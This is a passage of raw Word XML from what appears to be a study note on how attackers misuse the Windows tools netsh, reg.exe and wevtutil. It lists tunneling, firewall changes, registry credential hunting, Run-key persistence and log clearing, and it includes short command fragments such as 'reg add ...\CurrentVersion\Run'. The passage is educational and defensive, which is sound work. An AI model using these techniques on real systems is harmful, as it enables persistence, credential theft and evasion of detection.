        </w:numPr>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">🔴 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hide traffic (tunneling)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Send data through allowed ports (like 80/443) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">🔴 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Modify firewall rules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Allow malicious traffic / open ports </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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Maintain persistence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Keep communication channel even after reboot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>y:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>netsh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> lets attackers secretly route traffic and communicate with their server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>reg.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reg.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the command-line tool used to interact with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Windows Registry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead of clicking through the visual "Registry Editor" (regedit.exe), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reg.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows you to view and change system settings using text commands. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>It can:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Query:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Look up a setting (e.g., "What is the computer's name?").</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Add/Edit:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Change how a program behaves or enable a hidden Windows feature.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Export/Import:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Back up a section of settings or move them to another computer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>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bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">How attackers misuse </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>reg.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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Credential hunting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Search registry for saved creds / software configs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:left="1134" w:right="1134" w:gutter="0" w:header="0" w:top="1134" w:footer="0" w:bottom="1134"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:formProt w:val="false"/>
          <w:textDirection w:val="lrTb"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="code-block-viewer"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reg query HKLM\Software</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">🔴 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>System discovery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Check OS, installed apps, VM indicators </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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Persistence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Add startup entries (run malware on boot)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:left="1134" w:right="1134" w:gutter="0" w:header="0" w:top="1134" w:footer="0" w:bottom="1134"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:formProt w:val="false"/>
          <w:textDirection w:val="lrTb"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="code-block-viewer_Copy_1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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Defense evasion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Modify/delete registry keys to hide traces</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableContents"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>wevtutil</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableContents"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableContents"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wevtutil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = Windows Event Utility</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableContents"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableContents"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">wevtutil (Windows Event Utility) is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="FFFF00" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">command-line tool </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>used to manage the Windows Event Logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableContents"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>It can:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">view logs </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">search logs </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>clear logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableContents"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableContents"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableContents"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">How attackers misuse </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>wevtutil</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Log discovery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Search for login activity, errors, events</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:left="1134" w:right="1134" w:gutter="0" w:header="0" w:top="1134" w:footer="0" w:bottom="1134"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:formProt w:val="false"/>
          <w:textDirection w:val="lrTb"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="code-block-viewer_Copy_2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wevtutil qe Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">🔴 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Find specific events</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Look for: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4624 (login success) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
